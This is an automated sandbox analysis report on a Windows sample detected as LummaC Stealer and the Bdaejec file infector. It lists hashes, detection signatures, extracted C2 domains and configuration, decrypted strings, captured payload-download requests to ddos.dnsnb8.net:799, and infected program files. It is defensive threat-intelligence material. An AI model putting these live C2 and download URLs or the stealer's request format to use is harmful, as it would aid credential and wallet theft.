Windows Analysis Report
Lisect_AVT_24003_G1A_72.exe

Overview

General Information

Sample name:	Lisect_AVT_24003_G1A_72.exe
Analysis ID:	1481153
MD5:	0140e8aab1d9274870495213cdf82291
SHA1:	094a5f534dd47158b2e936f1c6bb8351fb3f1706
SHA256:	61f30e4ff3a0f6c6b50ac05dacc8344ba3ed9911c2888a606e7c15c4ea4a469f
Tags:	exe
Infos:

Detection

LummaC, Bdaejec, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Bdaejec

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Lisect_AVT_24003_G1A_72.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: healthproline.pro	Avira URL Cloud: Label: malware
Source: smallrabbitcrossing.site	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rars	Avira URL Cloud: Label: phishing
Source: https://strainriskpropos.store/api	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store:443/api	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/apiGaX	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/D%D	Avira URL Cloud: Label: malware
Source: https://punchtelephoneverdi.store:443/api	Avira URL Cloud: Label: malware
Source: https://snuggleapplicationswo.fun/	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarNp3	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/l	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/	Avira URL Cloud: Label: malware
Source: https://smallrabbitcrossing.site/api	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/api	Avira URL Cloud: Label: malware
Source: telephoneverdictyow.site	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar=	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarh	Avira URL Cloud: Label: phishing
Source: https://punchtelephoneverdi.store/	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/M%s	Avira URL Cloud: Label: malware
Source: https://punchtelephoneverdi.store/apihL	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/api;	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarZ	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarF;	Avira URL Cloud: Label: phishing
Source: https://telephoneverdictyow.site:443/api	Avira URL Cloud: Label: malware
Source: https://smallrabbitcrossing.site/	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1	Avira URL Cloud: Label: malware
Source: snuggleapplicationswo.fun	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B

Found malware configuration

Source: Lisect_AVT_24003_G1A_72.exe.5024.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}

Multi AV Scanner detection for domain / URL

Source: ddos.dnsnb8.net	Virustotal: Detection: 12%	Perma Link
Source: healthproline.pro	Virustotal: Detection: 10%	Perma Link
Source: telephoneverdictyow.site	Virustotal: Detection: 21%	Perma Link
Source: punchtelephoneverdi.store	Virustotal: Detection: 20%	Perma Link
Source: theoryapparatusjuko.fun	Virustotal: Detection: 20%	Perma Link
Source: snuggleapplicationswo.fun	Virustotal: Detection: 21%	Perma Link
Source: strainriskpropos.store	Virustotal: Detection: 21%	Perma Link
Source: smallrabbitcrossing.site	Virustotal: Detection: 21%	Perma Link
Source: https://strainriskpropos.store:443/api	Virustotal: Detection: 18%	Perma Link
Source: https://strainriskpropos.store/api	Virustotal: Detection: 18%	Perma Link
Source: healthproline.pro	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

ReversingLabs: Detection: 92%

Multi AV Scanner detection for submitted file

Source: Lisect_AVT_24003_G1A_72.exe

Virustotal: Detection: 86%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Lisect_AVT_24003_G1A_72.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: strainriskpropos.stor
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: telephoneverdictyow.site
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: punchtelephoneverdi.stor
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: smallrabbitcrossing.site
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: snuggleapplicationswo.fun
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: theoryapparatusjuko.fun
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: healthproline.pro
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kPnM2L--LogsDillerCloud

Uses 32bit PE files

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_003229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_003229E2

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00322B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00322B8C

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: strainriskpropos.stor
Source: Malware configuration extractor	URLs: telephoneverdictyow.site
Source: Malware configuration extractor	URLs: punchtelephoneverdi.stor
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: snuggleapplicationswo.fun
Source: Malware configuration extractor	URLs: theoryapparatusjuko.fun
Source: Malware configuration extractor	URLs: healthproline.pro
Source: Malware configuration extractor	URLs: strainriskpropos.stor
Source: Malware configuration extractor	URLs: telephoneverdictyow.site
Source: Malware configuration extractor	URLs: punchtelephoneverdi.stor
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: snuggleapplicationswo.fun
Source: Malware configuration extractor	URLs: theoryapparatusjuko.fun
Source: Malware configuration extractor	URLs: healthproline.pro

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 799

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49713 -> 44.221.84.105:799

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00321099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

2_2_00321099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic	DNS traffic detected: DNS query: healthproline.pro
Source: global traffic	DNS traffic detected: DNS query: theoryapparatusjuko.fun
Source: global traffic	DNS traffic detected: DNS query: snuggleapplicationswo.fun
Source: global traffic	DNS traffic detected: DNS query: smallrabbitcrossing.site
Source: global traffic	DNS traffic detected: DNS query: punchtelephoneverdi.store
Source: global traffic	DNS traffic detected: DNS query: telephoneverdictyow.site
Source: global traffic	DNS traffic detected: DNS query: strainriskpropos.store

Source: jawuwAtX.exe, 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp, jawuwAtX.exe, 00000002.00000003.2145539627.0000000000F50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarZ
Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
Source: jawuwAtX.exe, 00000002.00000002.2236447017.0000000002A4A000.00000004.00000010.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarF;
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarNp3
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://punchtelephoneverdi.store/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://punchtelephoneverdi.store/apihL
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://punchtelephoneverdi.store:443/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smallrabbitcrossing.site/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smallrabbitcrossing.site/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snuggleapplicationswo.fun/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/D%D
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/M%s
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/api;
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store:443/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/apiGaX
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/l
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site:443/api
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Installs a raw input device (often for capturing keystrokes)

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_6127ce1a-0

System Summary

PE file contains section with special chars

Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: #bu
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: jawuwAtX.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00326076		2_2_00326076
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00326D00		2_2_00326D00

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548

PE file contains executable resources (Code or Archives)

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Sample file is different than original file name gathered from version info

Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2178655247.0000000003497000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2193713939.0000000000431000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2180934441.0000000003472000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
Source: Lisect_AVT_24003_G1A_72.exe	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe

Uses 32bit PE files

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: jawuwAtX.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: jawuwAtX.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: jawuwAtX.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: Section: ZLIB complexity 0.9941202546453066
